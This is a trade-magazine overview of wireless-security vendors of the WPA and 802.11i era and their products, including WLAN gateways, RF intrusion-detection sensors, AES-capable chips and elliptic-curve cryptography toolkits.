Wireless Systems Design

Top Wireless-Security Vendors Vary In Their Approaches

The growing demand for integrated security on a multitude of wireless-device and network products is a marketing boon for gateway, hardware-chip, and software developers.

Who are the major players in the burgeoning wireless-security market? The answer to this question depends on how you define the word "major." Some might suggest that it means the companies with the highest revenues. Others might point to companies with the most market share. Perhaps a better approach, though, would be to look at a cross section of wireless-security companies. Such an examination might bring to light appliance vendors like Vernier, AirDefense, Cisco, Bluesocket, and even Nokia. It also would include hardware switch and chip suppliers, such as Broadcom, Proxim, and Via. Even software-intensive solutions like the one from Certicom would now be open to discussion.

This report takes that cross-sectional approach. While it doesn't cover all of the vendors in the security market, this article does present a representative sampling of companies and their wireless-security offerings. Because this is an overview, the companies aren't listed in any particular order. To begin, let's look at some of the wireless-network-appliance companies that make standalone gateway systems and related devices.

Founded in early 2001, Vernier Networks (www.verniernetworks.com) has developed the Adaptive Security Platform (ASP) approach to security. The aim of the ASP is to help companies balance the need for open network access while reducing the risk of intrusions. Its wireless-local-area-network (WLAN) security gateways are incorporated as OEMs in some of Hewlett Packard's networking systems.

The ASP solution consists of the Vernier 6500 series network appliances and the Vernier VNX software. The network appliances—single-purpose devices from which all nonessential functions have been stripped away—include the System 6500 and the IS 6500 Integrated System. For large enterprises, the System 6500 provides a tiered solution featuring a Control Server and one or more Access Managers. The Control Server allows network administrators to create and manage security policies from a central location. They also can monitor network usage and manage all Access Managers.

The Access Manager is a rack-mountable device. It performs access control, packet filtering, policy enforcement, and intrusion management for both subnets and wireless coverage zones downstream. Each Access Manager is deployed in-line in the data path. Its purpose is to function as a security gateway between end users and the network core.

The IS 6500 Integrated System provides a single-box solution for smaller deployments. All 6500-series appliances are supported by the company's VNX software, which includes the Vernier Rights Manager, the Vernier Domain Administrator, and policy-enforcement engines. No special software is required to run on the client devices.

For more information on the Vernier ASP system, please see the June 2003 issue of Wireless Systems Design (www.wsdmag.com/Articles/Index.cfm?ArticleID=6469).

As the name implies, AirDefense, Inc. (www.airdefense.net) provides security systems that monitor and protect WLAN airwaves. The company claims to have pioneered the concept of 24-to-7 monitoring using a distributed architecture of remote sensor probes and a server appliance. Its flagship product, AirDefense 4.0, has probes that communicate in real time with the server appliance. In turn, the server appliance analyzes the data to provide centralized, predictive views of rogue detection, policy enforcement, intrusion protection, and health monitoring of the wireless LAN (FIG. 1).

The first tier of the company's layered approach to security consists of remote RF sensors. This type of monitoring provides a continuous view of the network functioning. It can determine whether or not the security policies are being followed. These probes are essential to understanding what devices are in the air space, what devices are connecting with which users, and how the devices are interacting. By monitoring the air space, network administrators can identify trends for unusual traffic patterns, potential network abuse (such as large file transfers), and load balancing.

Recently, AirDefense announced one of the first tools to monitor Bluetooth security. This product, which is aptly called BlueWatch, identifies all Bluetooth-enabled devices and their communications within a given air space. It allows information-technology (IT) administrators to pinpoint devices that are either misconfigured or lacking authentication or encryption. BlueWatch identifies different types of Bluetooth-enabled devices including laptops, PDAs, keyboards, and cell phones. It provides key attributes, such as device class, manufacturer, and signal strength. More importantly, it can identify the services that are available on each device. Examples include network access, fax, and the audio gateway.

It's no secret that Cisco (www.cisco.com) is one of the largest suppliers of access points (APs) and bridges for wireless networks. The company's Aironet family of APs comes complete with a wireless-security suite based on the IEEE 802.1X standard. The key features of this security suite are mutual authentication and dynamic-encryption key management. Among its other features are data encryption using both Wired Equivalent Privacy (WEP) and the Temporal Key Integrity Protocol (TKIP). The Advanced Encryption Standard (AES) is being added this year. AES encryption is a critical feature of the IEEE 802.11i security specification. The security suite also boasts full support for the Wi-Fi Alliance security standard, Wi-Fi Protected Access (WPA).

The Aironet family of access points and bridges—including the 1100, 1200, 1300, and 1400 series—offers support for all 802.11a/b/g throughputs and protocols. Other Cisco security products include virtual-private-network (VPN) hardware and features for the Internetwork Operating System (IOS) and Security Device Manager software. These programs all support firewalls and identify the source of denial-of-service (DoS) attacks.

A wireless network's greatest risk is that a user doesn't have to be physically connected to the LAN in order to gain network access. To address this problem, Bluesocket, Inc. (www.bluesocket.com) introduced its first wireless gateway in 2001. Today, the company has a family of wireless gateways including the WG-1100, WG-2100, and WG-5000.

All of its gateways offer VPN-like encryption (PPTP and IPsec) and network-management features, such as role-based access control, bandwidth throttling, and authorization/authentication. Secure Mobility lets users roam securely across subnets without re-authenticating. The gateways support all flavors of 802.11 while extending and integrating legacy networking equipment (e.g., Cisco) with wireless infrastructure.

Recently, Bluesocket expanded into the wireless-monitoring market with the BlueSecure intrusion-detection system. This air-security product includes a server and dedicated sensors. They can monitor traffic on 802.11a, b, and g networks. The product allows WLAN administrators to view all user activities including neighboring WLANs, rogue or unauthorized radio APs, and outside threats posed by "wardriving."

The sensor system, which is called BlueSecure RF Sensor, comprises a general-purpose, built-in RF listening device. This device supports 802.11b/a/g as an overlay to enterprises with or without an existing WLAN. Because it works with any vendor's APs or Wi-Fi client devices, it doesn't require any changes to existing wireless or wired infrastructure.

Using both WLAN and cellular networks, more and more users are accessing the Internet and corporate networks from wireless devices. While both cellular networks and WLANs allow mobility for remote users, they lack a coherent way to restrict unauthorized user access. To combat this problem, Nokia (www.nokia.com) has offered the Secure Access System security mechanism. Because it resides at the network application layer, this system takes advantage of all of the security measures in the lower network layers. Any device with a web browser—from cellular handsets to wireless PDAs and laptops—can therefore utilize all web-enabled enterprise applications.

The Nokia Secure Access System (NSAS) is a hardware appliance. It improves wireless security by establishing an encrypted tunnel between the remote mobile/wireless device and the corporate network. Even if the wireless network is somehow compromised, the company claims that the confidentiality of the data between the remote user and the corporate network will be maintained. By ensuring a high level of security in the remote device itself, this system also improves wireless security. Remote users also are assured that a lost or stolen device won't translate into lost information.

The NSAS is a SSL VPN appliance that connects to an Internet firewall. It is designed to provide secure access to corporate intranets and extranets. It is built on Nokia's IP Security Platform and IPSO secure operating system.

Several big semiconductor-chip vendors play a significant role in wireless-network security. One such company is Broadcom (www.broadcom.com). Currently, it holds the chair position on the Wi-Fi Alliance's Security Council. That committee has driven the adoption of Wi-Fi Protected Access (WPA)—the first standards-based, interoperable security technology for Wi-Fi networks.

Broadcom has been incorporating AES technology into its hardware since the fall of 2002. In that same timeframe, the company introduced its original 802.11 product line. AES is required in order to run the now ratified 802.11i standard. Without having AES in hardware, a computationally intensive program could cause Wi-Fi products to slow down to unacceptable levels. The 802.11i standard will be certified interoperable by the Wi-Fi Alliance through its Wi-Fi Protected Access-2 (WPA-2) program. That program is scheduled to launch in September.

Of course, Broadcom also offers a multitude of chip products for the wireless market. For one example, take a look at the October 2003 issue of Wireless Systems Design (www.wsdmag.com/Articles/Index.cfm?ArticleID=6805). In addition to those hardware offerings, the company recently introduced a software security package called SecureEZSetupT (SES).

This program is designed for the non-technical user. It allows a Wi-Fi network to be securely set up by running a very simple, two-step set-up wizard on a PC. The user answers easy, non-technical questions, such as his or her birth date and pet's name. SES then configures the wireless router and PC by setting up the Service Set Identifier (SSID) and WPA—a standards-based security feature that's built into all Wi-Fi-certified products. Given the increasing number of users that telecommute or regularly work from home or abroad, SES is very valuable to IT managers and the enterprise environment as a whole. It helps to ensure that all home or satellite office networks are properly configured and security-enabled.

Another company that's active in the wireless-security chip market is Atmel (www.atmel.com). In the WLAN arena, this company offers a suite of 802.11b media-access-controller (MAC) and MAC-plus-baseband-controller parts. Both suites are eligible for Wi-Fi Protected Access certification. These low-power devices include hardware acceleration for WEP-64 and WEP-128 as well as hardware implementations for TKIP and AES.

In addition to secure processors, this company provides a line of high-security memory chips with data encryption. Called CryptoMemory, these chips are available from 1 to 256 Kb. They help ensure data security through a variety of techniques including an authentication protocol, data encryption, and tamper-protection circuits.

Among Atmel's other notable offerings is a family of secure RF devices. Dubbed CryptoRF Wireless ICs, they enable data encryption for applications like contactless smart cards and the industrial radio-frequency-identification (RFID) market. In addition, Atmel developed a fingerprint sensor in the area of biometrics. The FingerChip enables logon security for mobile devices (FIG. 2).

When it comes to wireless-networking equipment for Wi-Fi and broadband networks, Proxim (www.proxim.com) is a well-known developer. Perhaps its most recognized offerings in the security arena are the AP-2000 and the AP-4000. A key feature of both APs is their support for the IEEE 802.1x standard. Wi-Fi Protected Access user authentication is implemented using 802.1x and the Extensible Authentication Protocol (EAP).

The AP-2000 family supports 802.11b wireless networks with optional tri-mode (simultaneous 802.11a/b/g) operation and dual-radio support of multiple users. For high-performance needs, the AP-4000 product line comes preconfigured with tri-mode for the automatic support of all client types. It also supports 40-Mbps throughput with 802.11g and 802.11a simultaneous operation. On the security side, the AP-4000 has built-in rogue detection for 802.11b/g and 802.11a access points. In addition to existing standards-based security, it includes support for multiple, simultaneous security settings. Security settings for multiple groups allow a variety of users—whether they're employees, guests, or contractors—to securely share the same infrastructure.

All of Proxim's APs support security standards like Wi-Fi Protected Access for 802.1X mutual authentication. Other features include dynamic per-user and per-session rotating keys, rogue AP detection, and notification. Several secure management interfaces also are supported, such as SNMPv3 and SSL. Most of the company's APs are software upgradeable to AES and 802.11i.

Another way to provide security to wireless devices is through the hardware. Via Technologies (www.viatech.com), a fabless chip supplier located in Taipei, Taiwan, has integrated AES security into its CPU. This approach resulted in a low-power-consumption, small-footprint, x86 platform that's well suited for devices like wireless APs. Now, the company's PadLock Advanced Cryptography Engine (ACE) is embedded in the C5P Nehemiah processor-core architecture. As a result, VIA supports AES hardware-based encryption (FIG. 3)—a key element of the IEEE 802.11i security standard. The Via core is readily scalable to adapt to changing wireless-security requirements. According to the company, specialized RISC-based processors cannot match the economies of scale that allow the x86 processors to dominate cost/performance comparisons.

The VIA Eden family of embedded x86 processors offers low power consumption (less than 2.5 W max at 533 MHz) and a small package size (15 x 15 mm). Such features allow the processors to meet the design constraints of AP system developers. Currently, the processors' performance scales to over 1.4 GHz. That number will advance to 2 GHz with the next-generation core architecture.

Perhaps the primary benefit of these processors, however, is the capability to use the well-proven x86 software and hardware infrastructure to minimize development time and reduce system costs. The company's x86 processors have been adopted for a wide range of embedded applications by several wireless-device vendors. An example is the LocustWorld Mesh AP Router. It relies on a VIA EPIA VE5000 Mini-ITX mainboard to create a self-contained wireless-communications device for secure mesh-network topologies.

One of the biggest advantages of today's mobile device—namely, mobility—is also its biggest security weakness. Consumers demand that wireless mobile devices be small and lightweight while seldom needing to be recharged. These needs put severe constraints on the devices' security capabilities. The problem is that only limited processor power, memory, and communication function are available on mobile devices.

Certicom's (www.certicom.com) Elliptic Curve Cryptography (ECC) offers a promising solution to these challenges. ECC enables efficient authentication and key exchange. It uses less memory, processing power, and bandwidth than other public-key schemes, such as RSA. ECC also offers a technology that has been adopted by many industry standards including ANSI, FIPS, IEEE, IETF, ISO, and others.

The company's Security Builder Developer Toolkits allow developers to add security functionality to wireless devices and applications. Security Builder utilizes a common application programming interface (API) across multiple platforms and chip sets. It achieves a small security footprint while integrating current and legacy cryptographic algorithms and security protocols.

Recently, Certicom announced a new product that targets wireless operators. Called CodeSign, it is a standards-based code-signing application for secure code distribution. Because it is accessed through a web browser, CodeSign enables the remote distribution of firmware updates and applications over the air or via a wired network.

For more information on the Certicom security system, refer to the April 2004 issue of Wireless Systems Design (www.wsdmag.com/ Articles/Index.cfm? ArticleID=7918). This article has highlighted some of the major players in today's wireless-security industry. It also examined the different types of security implementations currently available for wireless devices. This rich diversity of solutions—ranging from appliance-product devices to hardware and software-intensive applications—should not be surprising. On the contrary, it helps to underscore the layered nature of today's most successful security frameworks.

Hide comments


  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.